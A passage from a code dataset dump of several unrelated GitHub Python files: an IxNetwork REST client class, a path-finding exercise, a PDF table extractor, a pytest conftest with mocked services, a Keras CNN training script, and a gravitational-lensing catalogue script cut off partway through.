class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.grouptrafficrange_592edfb5d660c2ef731fff853a50b1a6 import (\n GroupTrafficRange,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"GroupTrafficRange\", None) is not None:\n return self._properties.get(\"GroupTrafficRange\")\n return GroupTrafficRange(self)\n\n @property\n def OpaqueValueElement(self):\n \"\"\"\n Returns\n -------\n - obj(ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.opaquevalueelement_27bc1e55a7525caed38e30c9995224e2.OpaqueValueElement): An instance of the OpaqueValueElement class\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n from ixnetwork_restpy.testplatform.sessions.ixnetwork.vport.protocols.opaquevalueelement_27bc1e55a7525caed38e30c9995224e2 import (\n OpaqueValueElement,\n )\n\n if len(self._object_properties) > 0:\n if self._properties.get(\"OpaqueValueElement\", None) is not None:\n return self._properties.get(\"OpaqueValueElement\")\n return OpaqueValueElement(self)\n\n @property\n def ContinuousIncrOpaqueValuesAcrossRoot(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: It signifies the continuous increment of opaque values across root.\n \"\"\"\n return self._get_attribute(\n self._SDM_ATT_MAP[\"ContinuousIncrOpaqueValuesAcrossRoot\"]\n )\n\n @ContinuousIncrOpaqueValuesAcrossRoot.setter\n def ContinuousIncrOpaqueValuesAcrossRoot(self, value):\n # type: (bool) -> None\n self._set_attribute(\n self._SDM_ATT_MAP[\"ContinuousIncrOpaqueValuesAcrossRoot\"], value\n )\n\n @property\n def Enabled(self):\n # type: () -> bool\n \"\"\"\n Returns\n -------\n - bool: If true, enables the protocol.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"Enabled\"])\n\n @Enabled.setter\n def Enabled(self, value):\n # type: (bool) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"Enabled\"], value)\n\n @property\n def LabelValueStart(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The first label in the range of labels.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LabelValueStart\"])\n\n @LabelValueStart.setter\n def LabelValueStart(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LabelValueStart\"], value)\n\n @property\n def LabelValueStep(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The label value increment step for more than 1 range.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LabelValueStep\"])\n\n @LabelValueStep.setter\n def LabelValueStep(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LabelValueStep\"], value)\n\n @property\n def LspCountPerRoot(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: This is to specify how many different LSPs are created per Root.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LspCountPerRoot\"])\n\n @LspCountPerRoot.setter\n def LspCountPerRoot(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"LspCountPerRoot\"], value)\n\n @property\n def LspType(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str(p2mp): The type of multicast LSP.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"LspType\"])\n\n @property\n def RootAddrCount(self):\n # type: () -> int\n \"\"\"\n Returns\n -------\n - number: The root address count for this Multicast FEC range.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddrCount\"])\n\n @RootAddrCount.setter\n def RootAddrCount(self, value):\n # type: (int) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddrCount\"], value)\n\n @property\n def RootAddrStep(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: The Root Address increment step. This is applicable only if Root Address Count is greater than 1.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddrStep\"])\n\n @RootAddrStep.setter\n def RootAddrStep(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddrStep\"], value)\n\n @property\n def RootAddress(self):\n # type: () -> str\n \"\"\"\n Returns\n -------\n - str: The root address of the multicast LSP.\n \"\"\"\n return self._get_attribute(self._SDM_ATT_MAP[\"RootAddress\"])\n\n @RootAddress.setter\n def RootAddress(self, value):\n # type: (str) -> None\n self._set_attribute(self._SDM_ATT_MAP[\"RootAddress\"], value)\n\n def update(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, int, str, str) -> MulticastLeafRange\n \"\"\"Updates multicastLeafRange resource on the server.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def add(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, int, str, str) -> MulticastLeafRange\n \"\"\"Adds a new multicastLeafRange resource on the server and adds it to the container.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Returns\n -------\n - self: This instance with all currently retrieved multicastLeafRange resources using find and the newly added multicastLeafRange resources available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def remove(self):\n \"\"\"Deletes all the contained multicastLeafRange resources in this instance from the server.\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n self._delete()\n\n def find(\n self,\n ContinuousIncrOpaqueValuesAcrossRoot=None,\n Enabled=None,\n LabelValueStart=None,\n LabelValueStep=None,\n LspCountPerRoot=None,\n LspType=None,\n RootAddrCount=None,\n RootAddrStep=None,\n RootAddress=None,\n ):\n # type: (bool, bool, int, int, int, str, int, str, str) -> MulticastLeafRange\n \"\"\"Finds and retrieves multicastLeafRange resources from the server.\n\n All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve multicastLeafRange resources from the server.\n To retrieve an exact match ensure the parameter value starts with ^ and ends with $\n By default the find method takes no parameters and will retrieve all multicastLeafRange resources from the server.\n\n Args\n ----\n - ContinuousIncrOpaqueValuesAcrossRoot (bool): It signifies the continuous increment of opaque values across root.\n - Enabled (bool): If true, enables the protocol.\n - LabelValueStart (number): The first label in the range of labels.\n - LabelValueStep (number): The label value increment step for more than 1 range.\n - LspCountPerRoot (number): This is to specify how many different LSPs are created per Root.\n - LspType (str(p2mp)): The type of multicast LSP.\n - RootAddrCount (number): The root address count for this Multicast FEC range.\n - RootAddrStep (str): The Root Address increment step. This is applicable only if Root Address Count is greater than 1.\n - RootAddress (str): The root address of the multicast LSP.\n\n Returns\n -------\n - self: This instance with matching multicastLeafRange resources retrieved from the server available through an iterator or index\n\n Raises\n ------\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))\n\n def read(self, href):\n \"\"\"Retrieves a single instance of multicastLeafRange data from the server.\n\n Args\n ----\n - href (str): An href to the instance to be retrieved\n\n Returns\n -------\n - self: This instance with the multicastLeafRange resources from the server available through an iterator or index\n\n Raises\n ------\n - NotFoundError: The requested resource does not exist on the server\n - ServerError: The server has encountered an uncategorized error condition\n \"\"\"\n return self._read(href)\n","repo_name":"OpenIxia/ixnetwork_restpy","sub_path":"ixnetwork_restpy/testplatform/sessions/ixnetwork/vport/protocols/multicastleafrange_61982e4d7933d5db8e1c6734f344bc95.py","file_name":"multicastleafrange_61982e4d7933d5db8e1c6734f344bc95.py","file_ext":"py","file_size_in_byte":12714,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"66"} +{"seq_id":"28470307943","text":"def fun(i):\n if first[i] != 100:\n current = first[i]\n if current == 99:\n global count\n count = 1\n return count\n fun(current)\n if second[i] != 100:\n current = second[i]\n if current == 99:\n #global count\n count = 1\n return count\n fun(current)\nT = 10\nfor test_case in range(1, T + 1):\n length = list(map(int, input().split()))\n table = list(map(int, input().split()))\n first = [100] * 100\n second = [100] * 100\n count = 0\n a = 0\n while 1:\n first[table[a*2]] = table[a*2+1]\n a += 1\n if a < 0 or a >= length[1]:\n break\n second[table[a * 2]] = table[a * 2 + 1]\n a += 1\n if a < 0 or a >= length[1]:\n break\n fun(0)\n print(\"#%d %d\" % (test_case, count))\n\n","repo_name":"elves37/Algorithm","sub_path":"SW_Expert/4일차/1219_길찾기.py","file_name":"1219_길찾기.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24631965844","text":"import pandas as pd\r\nimport os\r\nimport camelot\r\n\r\ndef getcolname(name):\r\n name = name.lower()\r\n if name.find(\"name\") >= 0 or name.find(\"drug\") >= 0 :\r\n return \"Name of Drugs/ Cosmetics\"\r\n elif name.find(\"batch\") >= 0 or name.find(\"manuf\") >= 0 :\r\n return \"Batch No./ Date of Manufacture/ Date of Expiry/ Manufactured By\"\r\n elif name.find(\"reason\") >= 0 :\r\n return \"Reason for Failure\"\r\n elif name.find(\"receiv\") >= 0 :\r\n return \"Received From\"\r\n elif name.find(\"declared\") >= 0 :\r\n return \"Declared by\"\r\n elif name.find(\"year\") >= 0:\r\n return \"Year\"\r\n elif name.find(\"month\") >= 0 :\r\n return \"Month\"\r\n elif name.find(\"from\") >= 0 :\r\n return \"Drawn From\"\r\n elif name.find(\"draw\") >= 0 and name.find(\"by\") >= 0 :\r\n return \"Drawn By\"\r\n elif name.find(\"n\") >= 0 and name.find(\"s\") >= 0 :\r\n return \"Sr. No.\"\r\n else :\r\n return name\r\n\r\ndef mergelastandfirst(df0, df1):\r\n df = pd.DataFrame()\r\n last0 = df0.iloc[-1].tolist()\r\n first1 = df1.iloc[0].tolist()\r\n merged = [last0[i] + first1[i] for i in range(len(last0))]\r\n merged_df = pd.DataFrame([merged])\r\n df = df.append(df0.iloc[0: df0.shape[0] - 1, :], ignore_index=True)\r\n df = df.append(merged_df, ignore_index=True)\r\n df = df.append(df1.iloc[1: df0.shape[1], :], ignore_index=True)\r\n return df\r\n\r\ndef merge_Dataframes(df1,df2):\r\n if not (df2[0][0] == \"\"):\r\n df1 = df1.append(df2, ignore_index=True)\r\n\r\n else :\r\n df1 = mergelastandfirst(df1,df2)\r\n\r\n return df1\r\n\r\n# folder where splitted PDF files would be created and stored\r\nmain_dir = r\"C:\\Users\\lenovo\\Desktop\\ISB - Prof. Parshuram\\CDS data\\Split_PDFs\"\r\n\r\n# folder where extracted tables would be stored\r\nexl_path = r\"C:\\Users\\lenovo\\Desktop\\ISB - Prof. Parshuram\\CDS data\\ExtractedTables\"\r\n\r\nfor folder in os.scandir(main_dir):\r\n\r\n directory = folder.path\r\n name = os.path.basename(directory).strip(\".pdf\")\r\n df = pd.DataFrame()\r\n\r\n try:\r\n for filename in os.scandir(directory):\r\n tables = camelot.read_pdf(filename.path)\r\n try :\r\n data_f = tables[-1].df\r\n df = merge_Dataframes(df,data_f)\r\n except :\r\n pass\r\n\r\n for col in df.columns:\r\n colname = getcolname(df.iloc[0,col])\r\n df = df.rename(columns={col: colname})\r\n\r\n df = df.drop(df.index[[0]])\r\n\r\n excel_path = exl_path + \"/\" + name + \".xlsx\"\r\n\r\n df.to_excel(excel_path, index=False)\r\n\r\n except :\r\n print(name)\r\n\r\n\r\n\r\n\r\n","repo_name":"Shashankti/ISB_Data_Scrapping","sub_path":"extracttables.py","file_name":"extracttables.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33634384402","text":"# pylint: disable=wildcard-import, unused-wildcard-import, import-error\nfrom typing import Optional\nimport urllib\nimport uuid\n\nimport pytest\n\nfrom ride_discounts_plugins import * # noqa: F403 F401\n\nfrom tests_ride_discounts import common\n\n\ndef pytest_configure(config):\n config.addinivalue_line('markers', 'slow: mark slow test')\n\n\n@pytest.fixture(autouse=True)\nasync def user_statistics_handler(mockserver):\n @mockserver.json_handler('/user-statistics/v1/orders')\n def _v1_orders(request):\n return {'data': []}\n\n\n@pytest.fixture(name='start_revision')\ndef _start_revision():\n return '22'\n\n\n@pytest.fixture\ndef reset_revision(pgsql, start_revision):\n pgsql['ride_discounts'].cursor().execute(\n 'ALTER SEQUENCE ride_discounts.match_rules_revision '\n f'RESTART WITH {start_revision};',\n )\n\n\n@pytest.fixture\ndef reset_data_id(pgsql):\n pg_cursor = pgsql['ride_discounts'].cursor()\n pg_cursor.execute(\n 'ALTER SEQUENCE ride_discounts.match_data_data_id_seq '\n f'RESTART WITH {common.START_DATA_ID};',\n )\n\n\n@pytest.fixture\nasync def additional_rules():\n return [\n {\n 'condition_name': 'zone',\n 'values': [\n {\n 'is_prioritized': False,\n 'name': 'br_moscow',\n 'type': 'geonode',\n },\n ],\n },\n ]\n\n\n@pytest.fixture(autouse=True)\ndef mock_taxi_tariffs(mockserver):\n @mockserver.json_handler('/taxi-tariffs/v1/tariff_zones')\n def _tariff_zones(request):\n zones = [\n {\n 'name': name,\n 'time_zone': 'Europe/Moscow',\n 'country': 'rus',\n 'translation': name,\n 'currency': 'RUB',\n }\n for name in request.query.get(\n 'zone_names', 'moscow,boryasvo,vko',\n ).split(',')\n ]\n return {'zones': zones}\n\n\n@pytest.fixture(autouse=True)\ndef mock_tariff_settings(mockserver):\n @mockserver.json_handler('/taxi-tariffs/v1/tariff_settings/list')\n def _mock_tariff_setting_list(request):\n params = urllib.parse.parse_qs(request.query_string.decode())\n cursor = params.get('cursor', [''])[0]\n if cursor == 'final':\n return {'zones': [], 'next_cursor': 'final'}\n return {\n 'zones': [\n {\n 'categories': [\n {\n 'can_be_default': True,\n 'card_payment_settings': {\n 'max_compensation': 5000,\n 'max_manual_charge': 5000,\n 'max_refund': 5000,\n },\n 'charter_contract': True,\n 'client_constraints': [],\n 'client_requirements': [\n 'bicycle',\n 'childchair_moscow',\n 'yellowcarnumber',\n 'conditioner',\n 'nosmoking',\n ],\n 'comments_disabled': False,\n 'disable_ban_for_feedback': False,\n 'disable_destination_change': False,\n 'disable_live_location': False,\n 'disable_zone_leave': False,\n 'driver_change_cost': {},\n 'fixed_price_enabled': True,\n 'free_cancel_timeout': 300,\n 'glued_requirements': [],\n 'is_default': True,\n 'legal_entities_enabled': True,\n 'mark_as_new': False,\n 'max_card_payment': 5000,\n 'max_corp_payment': 5000,\n 'max_route_points_count': 5,\n 'name': 'econom',\n 'only_for_soon_orders': False,\n 'persistent_requirements': [\n 'animaltransport',\n 'nosmoking',\n ],\n 'req_destination': False,\n 'service_levels': [50],\n 'tanker_key': 'name.econom',\n 'toll_roads_enabled': False,\n },\n ],\n 'home_zone': 'moscow',\n 'timezone': 'Europe/Moscow',\n },\n {'home_zone': 'boryasvo', 'timezone': 'Europe/Moscow'},\n {'home_zone': 'vko', 'timezone': 'Europe/Moscow'},\n ],\n 'next_cursor': 'final',\n }\n\n\n@pytest.fixture(autouse=True)\ndef mock_billing_limits(mockserver):\n\n data = {\n 'currency': 'RUB',\n 'label': 'discount limit discount_limit_id',\n 'windows': [\n {\n 'type': 'tumbling',\n 'value': '100000.0000',\n 'size': 86400,\n 'label': 'Daily limit',\n 'threshold': 100,\n 'tumbling_start': '2019-01-01T00:00:00+00:00',\n },\n {\n 'type': 'sliding',\n 'value': '700000.0000',\n 'size': 604800,\n 'label': 'Weekly limit',\n 'threshold': 100,\n 'tumbling_start': '2019-01-01T00:00:00+00:00',\n },\n ],\n 'tickets': ['ticket-1'],\n 'ref': 'discount_limit_id',\n 'approvers': ['approver'],\n 'tags': ['ride-discounts'],\n }\n\n @mockserver.json_handler('/billing-limits/v1/get')\n def _get(request):\n return data\n\n @mockserver.json_handler('/billing-limits/v1/create')\n def _create(request):\n return data\n\n\n@pytest.fixture()\ndef client(taxi_ride_discounts):\n return taxi_ride_discounts\n\n\n@pytest.fixture()\ndef add_rules_check_url():\n return common.ADD_RULES_CHECK_URL\n\n\n@pytest.fixture()\ndef add_rules_url():\n return common.ADD_RULES_URL\n\n\n@pytest.fixture()\ndef service_name():\n return 'ride_discounts'\n\n\n@pytest.fixture()\ndef headers():\n return common.get_headers()\n\n\n@pytest.fixture()\ndef default_discount():\n return common.make_discount(hierarchy_name='full_money_discounts')\n\n\n@pytest.fixture()\ndef condition_descriptions(load_json):\n return load_json('condition_descriptions.json')\n\n\n@pytest.fixture()\ndef prioritized_entity_url():\n return common.PRIORITIZED_ENTITY_URL\n\n\n@pytest.fixture()\ndef hierarchy_descriptions_url():\n return '/v1/admin/match-discounts/hierarchy-descriptions'\n\n\n@pytest.fixture()\ndef draft_id_is_uuid():\n return True\n\n\n@pytest.fixture()\ndef add_discount(add_rules):\n async def wrapper(\n hierarchy_name: str,\n rules,\n series_id: Optional[uuid.UUID] = None,\n discount=None,\n ):\n await add_rules(\n {\n hierarchy_name: [\n {\n 'rules': rules,\n 'discount': discount or common.make_discount(\n hierarchy_name=hierarchy_name,\n ),\n 'series_id': str(series_id) if series_id else None,\n },\n ],\n },\n )\n\n return wrapper\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/tests_ride_discounts/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":7527,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"24210959320","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport numpy as np \nimport time\n\n\nimport tensorflow as tf #This imports tensorflow which this model is built in \n\n\nfrom tensorflow import keras\nfrom tensorflow.keras.models import Model, Sequential#Model and sequential can both be used when building the model \nfrom tensorflow.keras.layers import Dense, Dropout, Flatten, Input, Activation\nfrom tensorflow.keras.layers import Conv3D,Conv2D, MaxPooling2D\nfrom tensorflow.keras.layers import TimeDistributed\nfrom tensorflow.keras.layers import Lambda, concatenate\n\nfrom tensorflow.keras.optimizers import SGD, Adam, RMSprop, Nadam #This imports a series of different optimizers that can be tested \nfrom tensorflow.keras import backend as K\n\nfrom sklearn.metrics import *\n\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom tensorflow.keras.utils import to_categorical #To categorical is useful for dealing with tasks with \nfrom tensorflow.keras import layers \nfrom tensorflow.keras.initializers import Constant\nfrom tensorflow.keras.callbacks import EarlyStopping #Early stopping allows for stopping when the changes are small while training the model \n\nimport os\nimport shutil\n\ntrain_dir = 'DataDirectory'#This is wherever you have saved the data that was produced after preprocessing that you want to feed to your network \n\nsubdirs, dirs, files = os.walk('DataDirectory').__next__()#This will walk around the directory and pick out any files it discovers there \n\nm = len(files)#This is the amount of files located in the directory \n\nprint(m)\n\nfilenames = []#This stores the filenames \n\nlabels = np.zeros((m, 1))#This creates an array full of zeros that will be used for the labels on the \n\n\nfilenames_counter = 0#This counts how many files there are\nlabels_counter = -1#This counts how many lables there are\n\nfor subdir, dirs, files in os.walk(train_dir):\n for file in files:\n filenames.append(file)#Appends file from the directory \n labels[filenames_counter, 0] = int(file[0]) #Gets the label from the first letter of the file (i.e. a file should be named something like 1e{} for this to work)\n filenames_counter = filenames_counter + 1\n labels_counter = labels_counter+1\n \n# For now just renames it, not really necessisary at this this stage \ny_labels_one_hot = labels\n\n\nfrom sklearn.utils import shuffle #Shuffle does what it says and randomizes the file name order \n\nfilenames_shuffled, y_labels_one_hot_shuffled = shuffle(filenames, y_labels_one_hot)\n\n\nfrom sklearn.model_selection import train_test_split #This allows the splitting of the dataset into a training data set and a validation data set without having to do it by hand \n\n\nfilenames_shuffled_numpy = np.array(filenames_shuffled)#This creates an array of the file names \n\n#This splits the data into a training and validation set with the test size specifying how much of the data is in the validation data set \nX_train_filenames, X_val_filenames, y_train, y_val = train_test_split(\n filenames_shuffled_numpy, y_labels_one_hot_shuffled, test_size=0.3, random_state=1)\n\n#Just prints the size of the different datasets as a way to double check \nprint(X_train_filenames.shape)\nprint(y_train.shape) \nprint(X_val_filenames.shape) \nprint(y_val.shape) \n\n#The batch_size specifies how large the minibatch size is going to be\nbatch_size = 32\n#The number of categories that will be used \nNumberClasses = 4 \n\n\nclass My_Custom_Generator(keras.utils.Sequence):#This is a generator that will load only the batch size number of files per iteration rather than loading alll of the data at once \n \n def __init__(self, filenames, labels, batch_size) :\n self.filenames = filenames#The file names inputs \n self.labels = labels#The labels input \n self.batch_size = batch_size #The batch size once again \n \n \n def __len__(self): #This gets the number of iterations that have to be performed to loop through all of the data and casts it as an integer \n return (np.ceil(len(self.filenames) / float(self.batch_size))).astype(np.int)\n\n def __getitem__(self, idx) :#This function actually loads the data \n batch_x = self.filenames[idx * self.batch_size : (idx+1) * self.batch_size]#This gets the filenames in the batch and prepares for the data to be loaded \n \n batch_y = self.labels[idx * self.batch_size : (idx+1) * self.batch_size]#This deals with the labels of the data in the batch \n \n Array = []\n\n \n for file_name in batch_x:#This will loop through the files included in the batch \n A = np.load('/DataDirectory/' + str(file_name))#This assumes that the data is some file that can be directly loaded using np.load\n AA = A['arr_0']#In an .npz file the array is saved under this header \n Array.append(AA)\n\n \n ADone = np.array(Array)#Make an array of the loaded data \n print(ADone.shape[0])#Prints the shape \n ADone = ADone.reshape(ADone.shape[0],35,8,450,1)#This ensures the data has the right shape for this case the shape is consistent with a data set that includes both Ecal and Trigger Scintillator data, if considered just Ecal change this to ADone = ADone.reshape(ADone.shape[0],34,7,450,1) \n LL = []\n\n for i in batch_y:#Loop through the labels \n JJ = i[0]-1 #Since our label goes from 1-4 we need to reduce it to 0-3 \n LL.append(JJ)\n \n YY = LL #Just renames it \n YY = to_categorical(np.array(YY),num_classes=NumberClasses) #This changes the labels into an array with categories that can be handled by the model \n print(YY.shape)\n return np.array(ADone), YY# This returns the loaded data and the labels \n \n \n\n\n\nmy_training_batch_generator = My_Custom_Generator(X_train_filenames, y_train, batch_size)#This loads a training batch generator \n\nmy_validation_batch_generator = My_Custom_Generator(X_val_filenames, y_val, batch_size)#This loads a validation batch generator \n\n\nfrom tensorflow.keras.layers import BatchNormalization #BatchNormalization can be used to normalize the input arrays which can make it easier for the network to deal with the arrays especially if the data has a lot of large or small numbers \n\nfrom tensorflow.keras import regularizers #Regulizers help with validation performance, you can combine l1l2() or use them seperately \n\n\n#The Model here was Used for the Ecal and Trigger Scintillator Dataset\n\nmodel = Sequential()#Sequential allows for the building of models by adding layers in order \n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu',input_shape=(35,8,450,1)))#This adds a 3D convolutional layer \nmodel.add(BatchNormalization())#This adds a batch normalization layer with no specified axis \nmodel.add(layers.MaxPooling3D((2,2,2))) #Max Pooling layer in 3D\n\n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((1,1,2))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,1,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((1,1,3))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,2,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((2,1,5))) \n\n\n\nmodel.add(layers.Conv3D(64,(2,1,2),activation='relu'))\nmodel.add(BatchNormalization())\nmodel.add(layers.MaxPooling3D((2,1,3))) \n\nmodel.add(tf.keras.layers.Flatten())#This layer flattens the data\n\nmodel.add(layers.Dense(128,'tanh',kernel_regularizer=regularizers.L1(l1=1e-3))) #This adds an L1 regularizer in a dense layer thsat is just a series of connected nodes \n\nmodel.add(Dropout(0.6))#This adds a dropout layer that aids validation set performance \n\nmodel.add(layers.Dense(NumberClasses,'softmax'))#Adds a final output layer using softmax \n\nmodel.summary()#This prints a summary of the model \n\n\nlearning_rate = 0.005\n\n\n\n#Loss Function: CategoricalCrossentropy\n\nmodel.compile(Adam(learning_rate),tf.keras.losses.CategoricalCrossentropy(),['accuracy'])#This compiles the model with an Adam optimizer and the Categorial Crossentropy loss function \n\n#Estimator is just a name for the results from our model it can be named anything, model.fit() initiates the training of the network and it will loop over the data. This will be performed 15 times as epochs = 15, early stopping can be added to the model as well \nEstimator = model.fit(my_training_batch_generator,epochs = 15,verbose = 1,validation_data = my_validation_batch_generator) #,callbacks=[EarlyStopping(patience=15)])\n\nmodel.save(\"ModelNameHere\")#This saves the model, you can train and then stop and then resume the training just have to reload the model \n\nplt.figure()\nplt.ylabel('Loss / Accuracy')\nplt.xlabel('Epoch')\nfor k in Estimator.history.keys():#This makes a plot of the overall performance of the model over the number of epochs \n plt.plot(Estimator.history[k], label = k) \nplt.legend(loc='best')\nplt.show()\nplt.savefig(\"ModelHistory.png\")\n\n\n\n#Load the model for extra work by using keras.models.load_model\n\n#reconstruct = keras.models.load_model(\"ModelNameHere\")\n\n\n\n\n\n\n\n\n\n","repo_name":"Udcstb99/LDMXML","sub_path":"CNNModelANN.py","file_name":"CNNModelANN.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"6474239952","text":"def bagi(a, b):\n # Memeriksa tipe data a dan b\n if not (isinstance(a, float) or isinstance(a, int)):\n raise ValueError('Nilai a harus bertipe bilangan')\n if not (isinstance(b, float) or isinstance(b, int)):\n raise ValueError('Nilai b harus bertipe bilangan')\n \n # Memeriksa apakah b adalah nol\n if b == 0:\n raise ZeroDivisionError('')\n\n return a / b\n\ndef main():\n try:\n # Memanggil fungsi bagi dengan argumen 6.0 dan 3\n c = bagi(6.0, 3)\n print(c)\n\n except ValueError as e:\n print(e)\n\n except ZeroDivisionError as e:\n print(e)\n\nif __name__ == '__main__':\n main()\n","repo_name":"Gustinest/Python-Basics","sub_path":"Penanganan eksepsi/raise.py","file_name":"raise.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"40910333991","text":"import sys\nsys.path.append('../..')\nfrom lenser import *\nimport numpy as np\nfrom astropy.io import fits\nimport pandas as pd\nimport time, sys\n\n\n\n\"\"\"\nModule: lenser_run_cat_multi_fit\n.. synopsis: Runs an entire catalogue of galaxy images through Lenser in multi-fit mode \n and exports pickle file of bestfit parameters\n.. module author: Evan J. Arena \n\n.. This script will import one of the Catalogues in the Catalougues folder and run all of the images through Lenser.\n.. A prep file for a catalogue is required for object identification.\n.. Best-fit parameters are dynamically saved in dataframe form to a pickle file.\n\"\"\"\n\n# Catalogue choice\ncat_choice = 'COSMOS'\n# Choice of bands\nbands = ['F814W', 'F606W', 'F125W']\n# If no extra condition is required, use condition = ''\n# .. You may wish to have condition = _PSF, say, to \n# .. differentiate between runs that do or do not \n# .. convolve a PSF\n# .. e.g. condition = '_F814W_COSMOS_no-PSF'\ncondition = ''\n \n# Prepare Catalogue\nif cat_choice == 'COSMOS':\n path_to_cat = '../Catalogues/COSMOS/'\n prep_file = 'COSMOS-morph-info-rev1.pkl'\n im_fold = ['Images_'+bands[i]+'/' for i in range(len(bands))]\n input_params = ['name','class','z','U-R']\nelse:\n print('Error! Need a catalog choice.')\n\ndef update_progress(job_title, progress):\n \"\"\"\n Progress bar\n \"\"\"\n length = 20 # modify this to change the length\n block = int(round(length*progress))\n msg = \"\\r{0}: |{1}| {2}%\".format(job_title, \"[]\"*block + \"-\"*(length-block), round(progress*100, 2))\n if progress >= 1: msg += \" Complete\\r\\n\"\n sys.stdout.write(msg)\n sys.stdout.flush()\n\n# Parameters for pickle file \noutput_params = ['xc','yc','ns','rs','q','phi', # Galaxy fit parameters\n 'psi11','psi12','psi22','psi111','psi112','psi122','psi222', # Lensing fit parameters\n 'err_xc','err_yc','err_ns','err_rs','err_q','err_phi', # Error on galaxy fit parameters\n 'err_psi11','err_psi12','err_psi22', # Error on lensing fit parameters\n 'err_psi111','err_psi112','err_psi122','err_psi222', # --\n 'rchi2', # chisquared of fit\n 'F1_fit', 'F2_fit', # Flexion from fi\n 'G1_fit', 'G2_fit', # --\n 'I0', 'a'] # Galaxy normalization and size\n\n# Prepare pickle file\ncol_list = input_params+output_params \noutput_filename = cat_choice+'_'+str(time.localtime()[1])+str(time.localtime()[2])+str(time.localtime()[0])\n# .. dict of variable lists\narrs = {k:[] for k in range(len(input_params+output_params))} \n\n# Get the list of objects to loop through LENSER\n# .. Read in prep frame file\nprep_frame = 